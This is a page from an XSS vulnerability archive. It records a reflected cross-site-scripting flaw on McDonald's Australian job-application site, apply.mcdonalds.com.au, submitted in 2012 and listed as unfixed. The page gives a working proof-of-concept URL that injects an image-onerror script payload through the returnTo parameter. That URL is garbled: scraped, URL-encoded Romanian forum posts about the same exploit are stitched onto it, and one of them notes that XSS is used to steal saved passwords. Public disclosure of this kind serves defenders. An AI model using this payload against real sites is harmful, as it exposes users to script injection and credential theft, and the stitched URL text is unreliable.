Advertisements:
Security researcher longrifle0x, has submitted on 14/01/2012 a cross-site-scripting (XSS) vulnerability affecting apply.mcdonalds.com.au, which at the time of submission ranked 84581 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 01/08/2012. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.
Date submitted: 14/01/2012 Date published: 01/08/2012 Fixed? Mail us!Status:  UNFIXED
Author: longrifle0x Domain: apply.mcdonalds.com.au Category: XSS Pagerank: 84581
URL: https://apply.mcdonalds.com.au/public/index.cfm?action=applicantLogin&returnTo=/%22%3E%3C/object%3E%
3C/script%3E%3C/title%3E%3Cimg%20src=1%20onerror=alert%281337%29%3E&Share|LikenSnoopy%20and%20Slice2
28%20like%20this.wWw.Scoala-De-Soferi.hi2.RoQuick%20reply%20to%20this%20message%20Reply%20%20%20Repl
y%20With%20Quote%20Reply%20With%20Quote%20%20%20Multi-Quote%20This%20MessageRe:%20[Xss]%20McDonalds0
1-04-2012,%2008:47%20AM%20#2pr0totypEpr0totypE%20is%20offlineRegistered%20user%20Bautor%20de%20bere%
20Array%20pr0totypE%27s%20AvatarJoin%20DateNov%202011LocationYou%20can%27t%20find%20me;%20I%20can%20
only%20find%20you.......Certainly%20is%20that%20CHUCK%20NORRIS%20can%20find%20us%20both%20:%29%29%29
Posts37Rep%20Power0Send%20a%20message%20via%20Yahoo%20to%20pr0totypEDefaultCe%20face?%20E%20doar%20u
n%20link%20spre%20o%20pagina%20cu%20angajari%20de%20la%20Mac?Share|LikeNu%20sunt%20foarte%20intelige
nt,%20dar%20sunt%20pe%20cat%20se%20poate%20de%20corect.[TuToriaL%20FlooD%20IP]Quick%20reply%20to%20t
his%20message%20Reply%20%20%20Reply%20With%20Quote%20Reply%20With%20Quote%20%20%20Multi-Quote%20This
%20MessageRe:%20[Xss]%20McDonalds01-04-2012,%2009:53%20AM%20#3GeckoGecko%20is%20online%20nowDesigner
%20Cultul%20betivilor%20Array%20Gecko%27s%20AvatarJoin%20DateMar%202011LocationLocation,%20location,
%20location...Posts1,182Rep%20Power2DefaultQuote%20Originally%20Posted%20by%20pr0totypE%20View%20Pos
tCe%20face?%20E%20doar%20un%20link%20spre%20o%20pagina%20cu%20angajari%20de%20la%20Mac?Printr-un%20a
tac%20XSS%20poti%20injecta%20cod%20javascript%20in%20o%20pagina%20web%20direct%20in%20address%20bar.
%20Majoritatea%20oamenilor%20folosesc%20acest%20atac%20pentru%20a%20fura%20parolele%20salvate%20in%2
0calculatoarelor%20victimelor.Acel%20onerror=%22alert%281337%29%22%20executa%20cod%20JavaScript.Shar
e|Like%22Take%20your%20time%20and%20do%20your%20best!%22Quick%20reply%20to%20this%20message%20Reply%
20%20%20Reply%20With%20Quote%20Reply%20With%20Quote%20%20%20Multi-Quote%20This%20MessageRe:%20[Xss]%
20McDonalds01-04-2012,%2009:54%20AM%20#4pr00fpr00f%20is%20offlineRegistered%20user%20Bautor%20de%20a
bsinth%20ArrayJoin%20DateDec%202010Posts765Rep%20Power3DefaultQuote%20Originally%20Posted%20by%20pr0
totypE%20View%20PostCe%20face?%20E%20doar%20un%20link%20spre%20o%20pagina%20cu%20angajari%20de%20la%
20Mac?Cross-site%20scripting%20-%20Wikipedia,%20the%20free%20encyclopediaIgnoran%C8%9Ba%20nu%20aduce
%20cuno%C8%99tin%C8%9Be.%20Precum%20%C8%99i%20fonturile%20colorate.Share|LikeYour%20mother%20is%20so
%20fat,%20the%20recursive%20function%20computing%20her%20mass%20causes%20a%20stack%20overflow.Quick%
20reply%20to%20this%20message%20Reply%20%20%20Reply%20With%20Quote%20Reply%20With%20Quote%20%20%20Mu
lti-Quote%20This%20Message
Click here to view the mirror
Buy XSS Attacks book from Amazon!
XSS Attacks
Cross Site Scripting Exploits and Defense
Buy Detecting Malice book from RSnake
Website Fraud Loss Prevention
Advertisements
Home | News | Articles | Advisories | Submit | Alerts | Links | What is XSS | About | Contact | Some Rights Reserved.